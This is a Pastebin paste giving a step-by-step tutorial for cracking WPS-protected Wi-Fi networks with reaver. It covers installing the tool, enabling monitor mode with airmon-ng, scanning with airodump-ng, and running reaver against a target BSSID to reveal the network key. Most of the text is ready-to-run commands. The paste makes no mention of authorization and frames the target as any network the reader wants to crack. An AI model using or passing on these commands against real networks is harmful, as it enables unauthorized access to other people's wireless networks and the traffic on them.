defango

WAPCracking reaver

Sep 12th, 2018
352
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.68 KB | None | 0 0
  1. The limitations of aircrack-ng is, its accuracy is very poor when working with WPS encrypted networks.
  2.  
  3. For this purpose, we will be using a tool called "reaver" to crack WPS encrypted networks without the need of a wordlist or a dictionary attack.
  4.  
  5. reaver is also included in the toolkit in Kali Linux.
  6.  
  7. Requirements:
  8. -------------------------------------------------
  9. 1) Debian based linux distro ( for starters ), any other linux distro for advanced users.
  10.  
  11. 2) aircrack-ng
  12.  
  13. reaver Installation:
  14. ---------------------------------------------------
  15. If you use Ubuntu 13.04 or Higher (Including Mint):
  16.  
  17. Open terminal and type:
  18. sudo apt-get install reaver
  19.  
  20. For other Linux:
  21. Download reaver from here.
  22. https://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
  23.  
  24. Installation:
  25. Open Terminal Type:
  26.  
  27. sudo su
  28.  
  29. wget https://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
  30.  
  31. tar -xzvf reaver-1.4.tar.gz
  32.  
  33. cd reaver-1.4/src
  34.  
  35. ./configure
  36.  
  37. make
  38.  
  39. sudo make install
  40.  
  41. ---------------------------------------------------------
  42.  
  43. Now To Crack WPA Networks with reaver:
  44.  
  45. ----------------------------------------------------------
  46.  
  47. Open terminal type:
  48.  
  49. sudo su
  50. (run as root)
  51.  
  52. sudo airmon-ng start wlan0
  53. (enabling monitor mode on wireless card)
  54.  
  55. airodump-ng mon0
  56. (scanning for wireless networks)
  57.  
  58. --------------------------------------------------------------
  59.  
  60. When you find the network you want to crack, press Ctrl + C to stop scanning.
  61.  
  62. Copy the BSSID of the network.
  63.  
  64. type in:
  65.  
  66. reaver -i mon0 -b 11:22:33:44:55:66 -vv
  67. (note : replace 11:22:33:44:55:66 with the BSSID of the network you want to crack)
  68.  
  69. Press enter, and sit back.. reaver will do the rest and show you the KEY.
Add Comment
Please, Sign In to add comment